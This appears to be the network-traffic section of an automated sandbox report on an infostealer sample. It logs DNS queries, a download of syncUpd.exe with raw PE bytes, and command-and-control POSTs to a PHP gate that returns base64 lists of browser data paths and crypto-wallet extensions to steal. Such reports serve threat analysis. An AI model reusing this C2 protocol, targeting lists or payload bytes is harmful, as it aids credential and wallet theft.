Apr 27, 2024 01:31:21.564914942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564923048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564951897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565000057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.565006971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565046072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565093994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.565337896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565473080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565521955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.565525055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565615892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565666914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.565676928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.565779924 CEST	80	49734	176.97.76.106	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 27, 2024 01:31:13.794044971 CEST	192.168.2.4	1.1.1.1	0xfe06	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:31:14.886693954 CEST	192.168.2.4	1.1.1.1	0xfe06	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:01.167732000 CEST	192.168.2.4	1.1.1.1	0xbb41	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:02.014003038 CEST	192.168.2.4	1.1.1.1	0xe9a2	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:36.920311928 CEST	192.168.2.4	1.1.1.1	0x76c8	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 27, 2024 01:31:15.574671984 CEST	1.1.1.1	192.168.2.4	0xfe06	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:31:15.574724913 CEST	1.1.1.1	192.168.2.4	0xfe06	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:31:31.685834885 CEST	1.1.1.1	192.168.2.4	0xcbe3	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 01:31:31.685834885 CEST	1.1.1.1	192.168.2.4	0xcbe3	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:01.276547909 CEST	1.1.1.1	192.168.2.4	0xbb41	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:02.113970041 CEST	1.1.1.1	192.168.2.4	0xe9a2	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 01:32:02.113970041 CEST	1.1.1.1	192.168.2.4	0xe9a2	No error (0)	iolo0.b-cdn.net		185.93.1.247	A (IP address)	IN (0x0001)	false
Apr 27, 2024 01:32:37.028503895 CEST	1.1.1.1	192.168.2.4	0x76c8	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 01:32:37.028503895 CEST	1.1.1.1	192.168.2.4	0x76c8	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 01:32:37.028503895 CEST	1.1.1.1	192.168.2.4	0x76c8	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	7436	C:\Users\user\Desktop\VucRf0jboS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:08.487333059 CEST	204	OUT	GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:10.140281916 CEST	148	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 23:31:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	7436	C:\Users\user\Desktop\VucRf0jboS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:11.276288033 CEST	190	OUT	GET /ping.php?substr=two HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:11.737292051 CEST	190	OUT	GET /ping.php?substr=two HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:11.909671068 CEST	147	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 23:31:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	7436	C:\Users\user\Desktop\VucRf0jboS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:12.137057066 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:12.307903051 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 23:31:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 23:30:02 GMT ETag: "47e00-617084867e629" Accept-Ranges: bytes Content-Length: 294400 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 34 51 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 80 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PEL4Qd<A0@(h`T28@0.text `.rdatal0n@@.dataHLr@.rsrchj@@.relocT`h@B [TRUNCATED]
Apr 27, 2024 01:31:12.307943106 CEST	1289	IN	Data Raw: 41 00 e8 5f 27 00 00 59 c3 b9 74 db 01 04 e8 c8 02 00 00 68 7f 28 41 00 e8 49 27 00 00 59 c3 b9 60 db 01 04 e8 1f 03 00 00 68 75 28 41 00 e8 33 27 00 00 59 c3 6a 00 b9 68 db 01 04 e8 15 01 00 00 c3 6a 00 b9 5c db 01 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: A_'Yth(AI'Y`hu(A3'Yjhj\jpjdUQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
Apr 27, 2024 01:31:12.307984114 CEST	1289	IN	Data Raw: 00 53 53 ff 15 34 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 30 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a4 30 41 00 53 53 ff 15 a0 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 5c 30 41 00 8b 45 f8 8b 0d 50 Data Ascii: SS40AEP0ASSS00APS0ASS0AEPSEPSH0ASSSS\0AEP+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5PW=Dt
Apr 27, 2024 01:31:12.308022976 CEST	1289	IN	Data Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45 Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
Apr 27, 2024 01:31:12.308059931 CEST	1289	IN	Data Raw: ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 9c 88 41 00 e8 c0 03 00 00 cc Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]hAhAU]faayrUQEPN3B;HF]P(AVSVuWe};su'3EOu;vW+
Apr 27, 2024 01:31:12.308118105 CEST	1289	IN	Data Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
Apr 27, 2024 01:31:12.308157921 CEST	1289	IN	Data Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAAQ AAUEu$#3]@]U
Apr 27, 2024 01:31:12.308196068 CEST	1289	IN	Data Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40 Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$40@$/@Ir+$8/@$
Apr 27, 2024 01:31:12.308233976 CEST	1289	IN	Data Raw: 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 Data Ascii: $+AL$+W\|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD
Apr 27, 2024 01:31:12.308273077 CEST	1289	IN	Data Raw: 08 8b 7d e4 56 e8 2a 1c 00 00 59 c3 55 8b ec 6a 40 ff 75 0c ff 75 08 e8 2c ff ff ff 83 c4 0c 5d c3 6a 0c 68 20 8f 41 00 e8 2e 28 00 00 33 db 89 5d e4 33 c0 8b 7d 08 85 ff 0f 95 c0 85 c0 75 18 e8 7b 15 00 00 c7 00 16 00 00 00 e8 01 15 00 00 83 c8 Data Ascii: }VYUj@uu,]jh A.(3]3}u{39Et}WXY!]G@uqWYtt`C@A@$u)tt`C@AB$to]u%W
Apr 27, 2024 01:31:12.480509043 CEST	1289	IN	Data Raw: 50 e8 90 10 00 00 59 33 c0 eb 41 03 c0 50 e8 ac 25 00 00 89 06 59 85 c0 74 ed ff 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 54 30 41 00 85 c0 75 19 ff 15 58 30 41 00 50 e8 5a 10 00 00 ff 36 e8 c8 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3 Data Ascii: PY3AP%YtuPjujST0AuX0APZ6&Y3@^[]UQEPh@Aj0Ath@Auh0Atu]UuYu0AUQu&RYhjjjMjjj>U=@Ath@ASYtu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.172.128.76	80	7516	C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:14.075716019 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 32 37 45 45 43 34 32 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"BA827EEC42D32089257003------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"default10------KFIIJJJDGCBAAKFIIECG--
Apr 27, 2024 01:31:14.607377052 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4f 47 59 31 4e 7a 5a 6a 59 32 4a 6b 4d 44 45 77 5a 44 56 6b 59 6a 64 6b 4d 57 45 7a 4d 6a 55 32 4d 57 4d 35 5a 6a 45 32 59 7a 5a 6b 4e 47 52 69 59 6a 4d 35 5a 6d 4a 6c 4d 44 6c 69 59 7a 59 7a 59 7a 56 6a 4f 44 63 34 5a 47 55 32 4d 7a 41 30 4e 6a 51 7a 5a 44 59 30 5a 54 59 78 5a 6d 49 34 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: OGY1NzZjY2JkMDEwZDVkYjdkMWEzMjU2MWM5ZjE2YzZkNGRiYjM5ZmJlMDliYzYzYzVjODc4ZGU2MzA0NjQzZDY0ZTYxZmI4fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 27, 2024 01:31:15.895415068 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"browsers------HJKJKKKJJJKJKFHJJJJE--
Apr 27, 2024 01:31:16.178347111 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Apr 27, 2024 01:31:16.178390980 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 27, 2024 01:31:16.180488110 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="message"plugins------AKKEGHJDHDAFHIDHCFHD--
Apr 27, 2024 01:31:16.462311983 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:31:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2Z